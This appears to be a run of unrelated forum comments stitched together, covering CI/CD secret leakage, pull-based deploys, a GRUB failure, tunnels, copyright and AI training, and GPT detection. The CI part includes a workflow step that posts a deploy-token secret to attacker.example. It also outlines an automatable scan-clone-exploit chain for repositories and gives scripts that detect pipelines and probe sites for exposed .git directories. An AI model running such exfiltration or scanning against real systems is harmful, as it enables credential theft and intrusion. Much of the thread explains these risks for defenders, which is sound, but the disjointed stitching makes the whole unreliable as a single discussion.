No, in my YAML example you can see that no credentials are hard-coded directly into the pipeline. The credentials are configured separately, and the pipelines are free to use them for whatever actions they want.
This is how all major players in the market recommend you set up your CI pipeline. The problem lies in the implicit trust placed in the pipeline configuration, which is stored along with the code.
Even with secrets, if the CI/CD machine can talk to the internet, you can just broadcast the secrets to wherever you like (assuming you can edit the YAML and trigger the CI/CD workflow).
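To make that concrete, here's a minimal sketch of the exfiltration in a GitHub Actions-style workflow; the secret name and the endpoint are made up for illustration:

    # Hypothetical workflow: anyone who can edit this file and trigger CI
    # can exfiltrate whatever secrets the pipeline is allowed to read.
    name: build
    on: push
    jobs:
      build:
        runs-on: ubuntu-latest
        steps:
          - name: innocuous-looking-step
            # attacker-controlled endpoint; DEPLOY_TOKEN is an assumed secret name
            run: curl -s -X POST -d "token=${{ secrets.DEPLOY_TOKEN }}" https://attacker.example/collect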
I was thinking maybe a better approach, instead of having CI/CD SSH into the prod machine, is to have the prod machine just listen for changes in git (rough sketch below).
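Something like this, in Python; the repo path, branch, and restart command are assumptions:

    #!/usr/bin/env python3
    """Pull-based deploys: the prod box polls git instead of letting CI SSH in."""
    import subprocess
    import time

    REPO = "/srv/app"                              # assumed checkout on the prod machine
    BRANCH = "main"                                # assumed deploy branch
    DEPLOY_CMD = ["systemctl", "restart", "app"]   # assumed restart hook

    def git(*args):
        out = subprocess.run(["git", "-C", REPO, *args],
                             check=True, capture_output=True, text=True)
        return out.stdout.strip()

    while True:
        git("fetch", "origin", BRANCH)
        if git("rev-parse", "HEAD") != git("rev-parse", f"origin/{BRANCH}"):
            git("merge", "--ff-only", f"origin/{BRANCH}")  # fast-forward to the new commit
            subprocess.run(DEPLOY_CMD, check=True)
        time.sleep(60)  # plain git has no push notification, so we poll

The nice property is that the prod box only ever makes outbound connections with a read-only deploy key, so there are no inbound SSH credentials for the pipeline to leak.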
You're right, there are other avenues of exploitation. This particular approach was interesting to me because it is easily automatable (scour the internet for exposed credentials, clone the repo, detect if pipelines are being used — sketched below — and profit).
Other exploits might need more targeted steps. For example, embedding malware into the source code might require language / framework fingerprinting.
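The "detect if pipelines are being used" step is trivial to script once you have a clone; a sketch, with an illustrative list of well-known CI config paths:

    #!/usr/bin/env python3
    """Check a cloned repo for well-known CI config locations."""
    from pathlib import Path

    CI_MARKERS = [
        ".github/workflows",        # GitHub Actions
        ".gitlab-ci.yml",           # GitLab CI
        "bitbucket-pipelines.yml",  # Bitbucket Pipelines
        ".circleci/config.yml",     # CircleCI
        "azure-pipelines.yml",      # Azure Pipelines
    ]

    def uses_pipelines(repo):
        return [m for m in CI_MARKERS if (repo / m).exists()]

    print(uses_pipelines(Path("/tmp/cloned-repo")))  # placeholder clone path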
It's pretty common in systems where the final deployed output is the same as the root of the source tree. More often than not, lazy developers just git clone the repo and point their web server's document root at the cloned folder. In default configurations, .git is happily served to anyone who asks for it (a quick check for this is sketched below).
This seems to be automatically mitigated in systems that have a "build" / "compilation" phase, because only the compiled output needs to be deployed for the application to work in the first place. For instance, with Apache Tomcat only the packaged WAR ends up in the webapps directory, not the source tree.
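For what it's worth, probing a site for the exposed-.git misconfiguration takes only a few lines; the target URL here is a placeholder:

    #!/usr/bin/env python3
    """Probe for a publicly served .git directory."""
    import urllib.request

    def git_exposed(base_url):
        # A served .git/HEAD starts with "ref:" (or is a bare 40-char commit hash).
        req = urllib.request.Request(base_url.rstrip("/") + "/.git/HEAD",
                                     headers={"User-Agent": "git-exposure-check"})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                body = resp.read(64).decode("utf-8", "replace").strip()
                return resp.status == 200 and (body.startswith("ref:") or len(body) == 40)
        except Exception:
            return False

    print(git_exposed("https://example.com"))  # placeholder target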
Don't use this. I once tried it and it changed the UUID of the Linux partition without any warning. GRUB could no longer find the partition to boot from, so I was stuck at grub rescue.
Yeah, I get it, but everyone needs to be responsible for security as well. Look what happened with LastPass. I can totally see someone doing something silly like exposing a service with default creds, say a MySQL DB on a production box, then forgetting about it and getting a new job a year later.
I do block proxies like this, but it’s hard to block every little thing.
I remember when I believed in bastions and DMZs. Many companies have given up on them because they can only be enforced by policy, not by tech.
Ngrok is just one company tho; there are thousands of ways. WireGuard or Nebula can be self-hosted, with another server that has an actual open port forwarding the traffic. People can use SSH's reverse port forwarding too (e.g. "ssh -R 8080:localhost:80 user@vps" exposes a local web server on port 8080 of the VPS).
Or you can use cloudflared or another one of ngrok's competitors.
You are wrong, though public interest is certainly the basis of the fair use doctrine's purpose. The simplest way to show that fair use still allows commercialisation is probably this example: search engines absolutely depend on fair use if they include any content from the linked pages. (Some countries have even tried to call the act of linking itself copyright infringement, though they've tended to back off at least a little, requiring at least the title or other content, not just the URL, for it to count as infringement.)
It might be a problem to treat it as copyright. Copyright applies to reproduction, distribution, public performance... if I go to a library or bookstore and read books and look at their covers, copyright does not apply. Would an android that walks around learning things be subject to copyright? To what extent does it need a body and mobility to be more like a person and less like a scraper?
It might seem stupid, but I worry that if copyright starts applying to "mining", the next thing is it applying to humans watching things.
Of course, if an AI re-creates copyrighted content, copyright should apply, just like it applies when I redraw and sell the Mona Lisa, but not when I store it in my memory. I would pass the responsibility on to users. I don't fear my use of GitHub Copilot because its output is far from infringing any reasonable copyright... then again, I'm assuming the most likely way to infringe copyright with GPT is a prompt that almost explicitly requests it.
Funny thing is that recreations are not necessarily covered by copyright law. The clearest example of this is fonts, where (using imprecise terminology, but I think it'll be clear enough) the US only grants copyright protection to font files, not to the letter shapes. So tracing a commercial font is perfectly legal, even if you happened to end up with an identical result (though good luck proving to a court that that's what you did).
Detecting GPT-generated content reliably will take a fairly large language model, which would obviously need to run in the cloud. Given Apple's stance on privacy, sending private correspondence to the cloud is a huge no-no for them. Nobody is going to implement GPT detection, at least for emails.